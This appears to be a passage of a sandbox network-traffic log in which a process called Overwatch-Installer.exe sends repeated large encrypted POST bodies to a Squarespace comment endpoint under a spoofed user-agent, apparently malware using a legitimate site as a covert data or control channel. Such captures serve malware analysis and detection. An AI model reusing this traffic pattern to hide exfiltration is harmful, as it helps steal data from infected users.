2024-09-01 20:04:20 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 42 36 70 4a 6d 75 57 67 52 58 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTB6pJmuWgRXAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:20 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:20 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:20 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:20 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:20 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:20 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:20 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:20 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:21 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:20 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bd4JO-Jdg-fEZmVjMTEyNDgyMWQ3MjNmMGViMjE2MTM4OWE3YTIw; Path=/; Secure Set-Cookie: crumb=BUGnXDkCkh82MmJiMDhhNDNkZmEzNWQ0MzVhNGMzMGM1OGJiMDE3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: iAB7cn97/mhyJYi3m Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUGnXDkCkh82MmJiMDhhNDNkZmEzNWQ0MzVhNGMzMGM1OGJiMDE3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49731	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:21 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:21 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:21 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:21 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:21 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQaFqSYYI3NLMGUyOWFjZWYyZGY4ZjJiOTMyYmYzNThjODhiMTRl; Path=/; Secure Set-Cookie: crumb=BbnYCCBnNmPoZDEyNTc1MmRiZjM2YjAwOTNjM2Y2MDM4YWI1ZDE5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: G2DDGi24/S5qGRt0V Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbnYCCBnNmPoZDEyNTc1MmRiZjM2YjAwOTNjM2Y2MDM4YWI1ZDE5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49732	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:21 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:21 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:21 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 53 73 4b 53 6a 43 47 77 50 36 4e 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmSsKSjCGwP6NwgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:21 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:21 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:21 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:21 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:21 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:21 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:21 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:21 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:22 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:21 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXFq7Of-E_VXMTlhZDg2NTkzMWFiMzVlODVjYzdjYjg0Yjg2YWU5; Path=/; Secure Set-Cookie: crumb=BbFQfQBEq2lpYjViYTEyZTQ4MGNhMWNjYWU3YWVmZmMwOTFhZTM3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: scJb0dwd/APBwQyb7 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbFQfQBEq2lpYjViYTEyZTQ4MGNhMWNjYWU3YWVmZmMwOTFhZTM3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49733	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:22 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:22 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:22 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 77 45 4b 65 72 65 73 34 39 4c 4b 59 37 33 54 67 30 59 5a 6c 31 71 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2wEKeres49LKY73Tg0YZl1qif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:22 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:22 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdwpBCiwmj1LYmI3ZDg4NDBhNmQ2NmI0NGE4ZTFmYzY0NWRkZWZi; Path=/; Secure Set-Cookie: crumb=BRORFazdbopANDg5NWFiNjUzMGRmMDJiZjI4ZjA0YWFiZmQ5MWU3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ygd6hzCp/1f1lrolD Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRORFazdbopANDg5NWFiNjUzMGRmMDJiZjI4ZjA0YWFiZmQ5MWU3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49734	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:22 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:22 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:22 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:22 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:22 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bb7GG7xcKuACN2YwYmJhNWU3NTUyODQ1ODliY2UzMTZlOWI3YjM4; Path=/; Secure Set-Cookie: crumb=BWdSemUowOY-NTJmNjljMmMwYjYzMWRkNTcyNWJlZTFkYzc2ODMz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: DqCZCMkF/Haz8AVVJ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session 